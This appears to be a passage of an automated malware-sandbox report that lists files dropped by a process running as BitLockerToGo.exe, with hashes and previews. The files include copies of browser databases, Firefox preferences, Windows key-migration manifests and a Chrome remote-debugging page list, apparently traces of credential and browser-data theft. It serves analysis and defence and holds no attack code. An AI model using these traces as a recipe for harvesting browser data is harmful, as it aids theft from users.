                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):24008
                                                                                                                                                                                                                                                                    Entropy (8bit):6.062446965815151
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
                                                                                                                                                                                                                                                                    MD5:6AEAEBF650EFC93CD3B6670A05724FE8
                                                                                                                                                                                                                                                                    SHA1:A4FE07E6C678AC8D4DC095997DB5043668D103B4
                                                                                                                                                                                                                                                                    SHA-256:C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
                                                                                                                                                                                                                                                                    SHA-512:5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                                                    • Filename: N11R7lRasm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                    • Filename: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                    • Filename: random.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                    • Filename: hX2c2UOBSX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                    • Filename: dOuC8iH5As.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                    • Filename: SQ1NgqeTQy.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                    • Filename: 1l1ohfybAf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                    • Filename: random.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                    • Filename: 2E02vIiMfd.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                    • Filename: random.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q..Q..Q..E...S..E...]..Q..t..E...Z..E...P..E...S..E.S.P..E...P..RichQ..................PE..d....Q.!..........",.........$......................................................Bn....`A.........................................<..X....<..x....p..(....`..h....<...!......(....8..T............................0..............(1..0............................text...p........................... ..`.rdata..>....0......................@..@.data...`....P.......0..............@....pdata..h....`.......2..............@..@.rsrc...(....p.......4..............@..@.reloc..(............:..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                    C:\ProgramData\im7gd\gd2n7g

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):4533
                                                                                                                                                                                                                                                                    Entropy (8bit):5.1021772201912805
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:22X8PvMu0jPvJPM0UJl1/Qi9XexcElVOaBIpgmQlwYBwkbsgobVu:MUnZUb1xXMV37BhgVu
                                                                                                                                                                                                                                                                    MD5:477F010FDB6BD5E5E57D6DEC5449F2FB
                                                                                                                                                                                                                                                                    SHA1:73F9C03AF35B29EC2404BB70FEDC8C9ADADE74F6
                                                                                                                                                                                                                                                                    SHA-256:2DBEDD5D4D6645E9ED45563FDB1DC42387EF24C9CF5D6A08EC3BE448073C4696
                                                                                                                                                                                                                                                                    SHA-512:3C630BE96FC7FCD0036D254BA4D197AB31F37F6DAC411F8C78E624B0501D0205AF36CD5A29EC98D96D5D8D88EF2DBB2DF3A62C6F658A93302ECA500B8EC74F2F
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-dpapi-keys-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows V

                                                                                                                                                                                                                                                                    C:\ProgramData\im7gd\hvknym

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                    C:\ProgramData\im7gd\j5fkx4

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):126976
                                                                                                                                                                                                                                                                    Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                                    MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                                    SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                                    SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                                    SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                    C:\ProgramData\im7gd\jwb1ny

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):9571
                                                                                                                                                                                                                                                                    Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                                    MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                                    SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                                    SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                                    SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                    C:\ProgramData\im7gd\kxl689

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):2947
                                                                                                                                                                                                                                                                    Entropy (8bit):5.120077314818075
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
                                                                                                                                                                                                                                                                    MD5:C7E301D9DD77A21C1CDBD73A63AF205C
                                                                                                                                                                                                                                                                    SHA1:715D25AA0C06B2AD162F52A8DE06FB5040C389B1
                                                                                                                                                                                                                                                                    SHA-256:239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
                                                                                                                                                                                                                                                                    SHA-512:B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t

                                                                                                                                                                                                                                                                    C:\ProgramData\im7gd\lxt00z

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):2062
                                                                                                                                                                                                                                                                    Entropy (8bit):4.925445222257812
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:227+9gUKl+lxFcCY4/YBu4yTy3opyLyXyoyOyzylpjyA:22Sw+lxaWm3uCL9Gv
                                                                                                                                                                                                                                                                    MD5:60145F68B1CF9440FA663820AE11CE4B
                                                                                                                                                                                                                                                                    SHA1:10195A2926015E3024D769673E004AA60DFEC0A3
                                                                                                                                                                                                                                                                    SHA-256:4805E01EB0C9B3DFEB6B754D4148588E2FB798734D9EDE20E53EB8E75158B64F
                                                                                                                                                                                                                                                                    SHA-512:55D088040D25D4CBFF5A4210A85107666E628C67CA3134B0C836E135DBFE82AA4FA70185993E99D951307F7D159C1428B390727DA17EFEC5AA4BE9D799B96895
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="*".. name="Microsoft-Windows-Kerberos-Key-Distribution-Center-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. version="0.0.0.0".. />.. <migration>.. <machineSpecific>.. <migXml xmlns="">.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>.. <detect>.. <condition>MigXmlHelper.IsOSEarlierThan("NT", "6.0.0.0")</condition>.. </detect>.. </detects>.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\kdc\* [*]</pattern>.. </objectSet>.. </include>.. <exclude>.. <objectSet>.. <pattern type="Reg

                                                                                                                                                                                                                                                                    C:\ProgramData\im7gd\nop8qi

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):114688
                                                                                                                                                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                    C:\ProgramData\im7gd\p8gd2n

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):8193
                                                                                                                                                                                                                                                                    Entropy (8bit):5.027484893998515
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:WNPERXr2q6QOOzJMk67cY8GrPVYRjDjXK2FJpjjsjwjZjj6OzJMk67cY8GrPVYRM:a2gwP625sQ9jsw902I
                                                                                                                                                                                                                                                                    MD5:2D6ACF2AEC5E5349B16581C8AE23BF3E
                                                                                                                                                                                                                                                                    SHA1:0AA7B29E8F13EB16F3DFC503D4E8CC55424ECB15
                                                                                                                                                                                                                                                                    SHA-256:B48F54A1F8A4C3A25D7E0FBCB95BF2C825C89ACD9C80EBACE8C15681912EDEA2
                                                                                                                                                                                                                                                                    SHA-512:7943AA852F34778B9197C34E6B6978FE51E0CDD2130167CB9C7C56D1B2B1272051EFE03DF3A21A12ECB9B9303DE0733E335CDE0BBBE1A1FC429E3323D335A1FE
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. AuthUI has 3 different component names that matter in its migration story... The one that applies during the migration gather phase is as follows:.. Microsoft-Windows-Authentication-AuthUI: Vista and Win7.. Microsoft-Windows-Authentication-AuthUI-Component: Win8 (and beyond).. In order to support migration from Vista/Win7 to Win8, we update the Microsoft-Windows-Authentication-AuthUI component.. to gather in the MigWiz scope (in addition to the Upgrade scope, which it already supported)... -->.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration .. optimizePatterns="no".. offlineApply="no".. alwaysProcess="yes".. scope="MigWiz,

                                                                                                                                                                                                                                                                    C:\ProgramData\im7gd\wtr1no

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):1468
                                                                                                                                                                                                                                                                    Entropy (8bit):5.0065780470180306
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24:p/o2e8GFp8PvMu0Vnu7vFPvJ8+FXg0Mej39ImlQu/kKcCEF4wflBX0FCUK:22e8+8PvMu0VnuRPvJ8+FXgMtImlx3cd
                                                                                                                                                                                                                                                                    MD5:E68A33BDAF7AEBE6D5BBBCEFDED6AC5C
                                                                                                                                                                                                                                                                    SHA1:A1120341BB4452FCA47EB5EA8FA62A08BFC48073
                                                                                                                                                                                                                                                                    SHA-256:A5DC5B9F31D69E6F65F405EF4E187BAB262746AAAC08E95C195AA77A0B310DE1
                                                                                                                                                                                                                                                                    SHA-512:69E1A60C0FFE8AA19B55FABE47801EEEA7CF4C84E426318D8B7BFFAF09A14FC5F569573BE30753D354B604911A616C231F485B08C3778E0A214F7E3DC9C21D2C
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="artbaker".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="artbaker".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Cryptography-CryptoConfig-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration xmlns="">.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>..

                                                                                                                                                                                                                                                                    C:\ProgramData\im7gd\z58qqq

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):294912
                                                                                                                                                                                                                                                                    Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                                                                                    MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                                                                                    SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                                                                                    SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                                                                                                    SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):1787
                                                                                                                                                                                                                                                                    Entropy (8bit):5.367424006268806
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:SfNaoCdTEC8fNaoC0CXfNaoCVCSfNaoC6U20UrU0U8C6F:6NnCdTECoNnC0CPNnCVC6NnC6U20UrUQ
                                                                                                                                                                                                                                                                    MD5:80BBBEEE776DC98761EBA401C624E33D
                                                                                                                                                                                                                                                                    SHA1:D8F5AE230443FF155990DBE3CE35A93AE68B343D
                                                                                                                                                                                                                                                                    SHA-256:8590C5C112E4FAADFC7DF54D3DF0297BF4FCD7429C6977386B6AC9C3A34CFFA3
                                                                                                                                                                                                                                                                    SHA-512:972720DBD902F36B0FF89B1382B4595E725211BB5ADDDD8978ADAC2BD3941A1189658F6349AEF37B1221AB59E3F99C854C9B4914B85AE22EB02D4B70BC0024C0
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/75AC8F2BB3B8F9F024BC18789B5C3FFB",.. "id": "75AC8F2BB3B8F9F024BC18789B5C3FFB",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/75AC8F2BB3B8F9F024BC18789B5C3FFB"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/F8FB4BE057DD767EB25EC6E8BF863351",.. "id": "F8FB4BE057DD767EB25EC6E8BF863351",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/F8FB4BE057DD767EB25EC6E8BF863351"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                    Chrome Cache Entry: 65

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (821)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):826
                                                                                                                                                                                                                                                                    Entropy (8bit):5.169089551194061
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24:KiU/JgJBHslgT9lCuABATWuoB7HHHHHHHYqmffffffo:gxcKlgZ01BA6uSEqmffffffo
                                                                                                                                                                                                                                                                    MD5:E8CDC3B025441D2B8B1C6FF4A02E5D59
                                                                                                                                                                                                                                                                    SHA1:85340FA2F72C22764D39BD3BE32F22EAF9758622
                                                                                                                                                                                                                                                                    SHA-256:7F3302EE3AB54119F91BA1F098F074D287B825EA3D563AF83017BD69D8F350CC
                                                                                                                                                                                                                                                                    SHA-512:4B9B4E3B4097258F0D4906356AEA2239C3934CCB5F75AB0A7A6509FFD7B0D9B2ECCFEBEBCD1F2F6820C10033EE38D4CDF976C4D6F2B1B815DEBEF05E9039B6C2
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                    Preview:)]}'.["",["amad diallo injury","kentucky flooding","504 plans lawsuit","yellowjackets season 3","amazon kindle books download","mega millions jackpot lottery numbers","iowa hawkeyes wrestling","general hospital spoilers next week"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":"-474083818092430330","google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                                                                                                                                    Chrome Cache Entry: 66

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                                    Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                    Chrome Cache Entry: 67

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):5162
                                                                                                                                                                                                                                                                    Entropy (8bit):5.349865760247148
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:mtOTUb1db1ClNY5co7shdiUYVqig7O7aZCUgpgXEt94k+g8IHh8u928DoCLQ:mtOT8TfL1Vqig7mIg8IB8u88DA
                                                                                                                                                                                                                                                                    MD5:70A8F21806E7F1B739937970EBE49A0C
                                                                                                                                                                                                                                                                    SHA1:6BE9EEBCE438DE91FEB20E6A5458774B327AA9B4
